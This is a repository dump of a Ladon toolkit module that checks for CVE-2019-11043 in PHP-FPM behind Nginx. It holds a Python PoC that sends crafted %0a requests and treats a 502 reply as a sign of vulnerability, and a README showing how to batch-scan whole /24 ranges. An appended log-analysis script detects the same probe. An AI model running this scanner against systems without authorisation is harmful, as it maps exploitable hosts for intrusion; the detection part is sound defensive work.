├── CVE-2019-11043_POC.ini
├── CVE-2019-11043-POC.PNG
├── README.md
├── LICENSE
└── CVE-2019-11043-POC.py

/CVE-2019-11043_POC.ini:
--------------------------------------------------------------------------------
[Ladon]
exe=F:\Python279\python.exe
arg=CVE-2019-11043-POC.py $ip$

--------------------------------------------------------------------------------
/CVE-2019-11043-POC.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/k8gege/CVE-2019-11043/HEAD/CVE-2019-11043-POC.PNG

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
## Ladon POC Module CVE-2019-11043 (PHP-FPM + Nginx)

### Vulnerability overview
PHP-FPM remote code execution vulnerability (CVE-2019-11043)

During the Real World CTF hosted by Chaitin Tech, Andrew Danau, a security researcher from abroad, noticed while solving a CTF challenge that sending a %0a character in the URL to the target server made the service return an abnormal response, which suggested a vulnerability.

With certain misconfigured Nginx setups, a maliciously crafted request can make PHP-FPM execute arbitrary code.

### Example
Place the files in the same directory as Ladon.exe to batch-check a class C (/24) range or the URLs in url.txt.
``` bash
Ladon CVE-2019-11043_Poc.ini                                      # batch URL check (put url.txt in the root directory)
Ladon 192.168.1.37/24 CVE-2019-11043_Poc.ini                      # check every host in the /24 for the vulnerability
Ladon http://192.168.1.37:8080/index.php CVE-2019-11043_Poc.ini   # check a single URL
Ladon 5.5
By K8gege
Call AnyExe/Command
http://192.168.1.37:8080/index.php
load F:\Python279\python.exe
ISVUL: CVE-2019-11043 http://192.168.1.37:8080/index.php
```

### Download
Ladon: https://github.com/k8gege/Ladon

--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
MIT License

Copyright (c) 2019 k8gege

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

--------------------------------------------------------------------------------
/CVE-2019-11043-POC.py:
--------------------------------------------------------------------------------
import requests
import sys
# Ladon POC by k8gege
# VUL: CVE-2019-11043 (PHP-FPM + Nginx)
# The URL must include .php, e.g. http://192.168.1.37:8080/index.php

# CVE-2019-11043_POC.ini
# [Ladon]
# exe=F:\Python279\python.exe
# arg=POC\CVE-2019-11043-POC.py $ip$

# Example
# Ladon 192.168.1.37/24 poc/CVE-2019-11043_Poc.ini
# Ladon http://192.168.1.37:8080/index.php poc/CVE-2019-11043_Poc.ini

# Result
# Ladon 5.5
# Call AnyExe/Command
# http://192.168.1.37:8080/index.php
# load F:\Python279\python.exe
# ISVUL: CVE-2019-11043 http://192.168.1.37:8080/index.php

def checkpoc(url):
    try:
        headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0) Gecko/20100101 Firefox/6.0"}
        # Only probe pages that answer normally first.
        res1 = requests.get(url, headers=headers)
        if res1.status_code == 200:
            print("URL: "+url)
            # Vary the query padding; a 502 means the PHP-FPM worker failed on the request.
            for i in range(1499, 1900):
                res = requests.get(url + "/PHP%0Ais_poc_thistiest_lang.php?" + "K" * i, headers=headers)
                if res.status_code == 502:
                    print("ISVUL: CVE-2019-11043 "+url)
                    break
    except requests.RequestException:
        # Unreachable hosts and TLS/connection errors are skipped silently.
        pass

url = sys.argv[1]
if url.startswith(("http://", "https://")):
    checkpoc(url)
else:
    # Bare host or IP: try the common index.php locations.
    checkpoc("http://"+url+"/index.php")
    checkpoc("http://"+url+":8080/index.php")
    checkpoc("https://"+url+"/index.php")

--------------------------------------------------------------------------------
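
The probe this script sends (an encoded newline after the `.php` segment, a long single-character query, and a 502 when the worker fails) leaves a recognisable trace in Nginx access logs. The following is an added example, not part of the k8gege repository: it assumes the default `combined` log format, and the names `is_probe`, `scan`, `MIN_QUERY_LEN` and the sample log lines are constructed for illustration.

```python
import re
from collections import defaultdict

# Prefix of an Nginx "combined" access-log line (assumed log format).
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"\S+ (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
MIN_QUERY_LEN = 1000  # assumption: set below the 1499-byte padding the PoC starts at

def is_probe(target):
    """True if the request target carries %0a in the path after a .php segment
    and a long query made of one repeated character, as the PoC request does."""
    path, _, query = target.partition("?")
    if not re.search(r"\.php/[^?]*%0a", path, re.IGNORECASE):
        return False
    return len(query) >= MIN_QUERY_LEN and len(set(query)) == 1

def scan(lines):
    """Return {client_ip: {"probes": n, "got_502": bool}} for matching requests."""
    hits = defaultdict(lambda: {"probes": 0, "got_502": False})
    for line in lines:
        m = LOG_RE.match(line)
        if not m or not is_probe(m.group("target")):
            continue
        entry = hits[m.group("ip")]
        entry["probes"] += 1
        if m.group("status") == "502":
            entry["got_502"] = True  # the backend failed: treat this host as affected
    return dict(hits)

def _line(ip, target, status):
    # Builds one constructed log line in combined format.
    return '%s - - [27/Oct/2019:10:00:00 +0000] "GET %s HTTP/1.1" %s 0 "-" "-"' % (
        ip, target, status)

# Constructed sample log lines (documentation IP ranges, not real traffic).
PROBE = "/index.php/PHP%0Ais_poc_thistiest_lang.php?"
SAMPLE = [
    _line("198.51.100.7", "/index.php", 200),
    _line("198.51.100.7", PROBE + "K" * 1499, 200),
    _line("198.51.100.7", PROBE + "K" * 1500, 502),
    _line("203.0.113.9", "/search.php?q=" + "a" * 1200, 200),
]

if __name__ == "__main__":
    for ip, info in scan(SAMPLE).items():
        print(ip, info)
```

A client with `got_502` set means the probed site returned the status the PoC reports as `ISVUL`, so that host is the first to check for a patched PHP version and for the Nginx `PATH_INFO` handling.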